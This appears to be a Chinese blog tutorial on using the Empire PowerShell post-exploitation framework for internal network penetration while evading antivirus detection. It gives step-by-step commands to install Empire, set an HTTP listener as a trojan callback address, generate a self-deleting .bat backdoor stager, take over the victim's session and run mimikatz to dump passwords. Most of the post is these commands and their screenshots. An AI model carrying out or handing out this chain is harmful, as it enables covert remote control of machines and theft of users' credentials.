逍遥子

内网渗透绕过查杀的一种新思路之Empire
介绍昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗...
扫描右侧二维码阅读全文
15
2019/04

内网渗透绕过查杀的一种新思路之Empire

介绍

昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。

安装

001.jpg

git clone https://github.com/EmpireProject/Empire.git

Empiresetup目录执行install.sh文件

002.jpg

./install.sh

最后设置数据库密码那里可以默认回车,也可以自己设置

踩坑

如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。
003.jpg

使用

  • 监听
(Empire)> listeners  
  • 选择监听方式
(Empire: listeners) > uselistener http  
  • 查看需要配置的选项
Empire: listeners/http) > info    
  • 设置监听的名字
(Empire: listeners/http) > set Name backdoor

(Empire: listeners/http) > set Host http://192.168.80.131:4447             #设置木马反弹回连地址

(Empire: listeners/http) > set Port 4447 #设置本地监听端口
Empire: listeners/http) > execute     #执行监听

004.jpg
至此,监听工作完成。我们开始配置生成后门。

生成木马

(Empire: listeners/http) > back #返回上层模块
(Empire: listeners) > usestager windows/launcher_bat backdoor  # 选择木马种类

这里我选择的是bat类型的脚本,当然你们可以选择其他的。后面的backdoor就是刚刚我们设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

(Empire: stager/windows/launcher_bat) > info     #查看需要配置的

你可以set OutFile 到你指定的目录(绝对路径)

(Empire: stager/windows/launcher_bat) > execute  #执行生成木马

005.jpg
拷贝运行木马、
006.jpg
弹出一个黑框后,它自动消失了,是因为我们刚才生成backdoor的时候其中一个选项delete设置的True,运行结束后删除自身。
点击完我们的backdoor之后,我们回到我们的机器可以看到已经获取到了客户端的一个会话。

(Empire: stager/windows/launcher_bat) > agents   #查看获取的代理会话

一个会话已经建立完成。
007.jpg

(Empire: agents) > rename HZFT7AX1 win7pro #更改会话名字

008.jpg

  • 建立会话
interact kali

009.jpg

  • 查看密码
mimikatz

10.jpg
更多命令,点击help

Last modification:April 25th, 2019 at 02:18 pm
正在沿街乞讨中……

Leave a Comment

One comment

  1. nick Google Chrome 70.0.3538.77 Linux 中国 江苏 扬州

    动态查杀试一下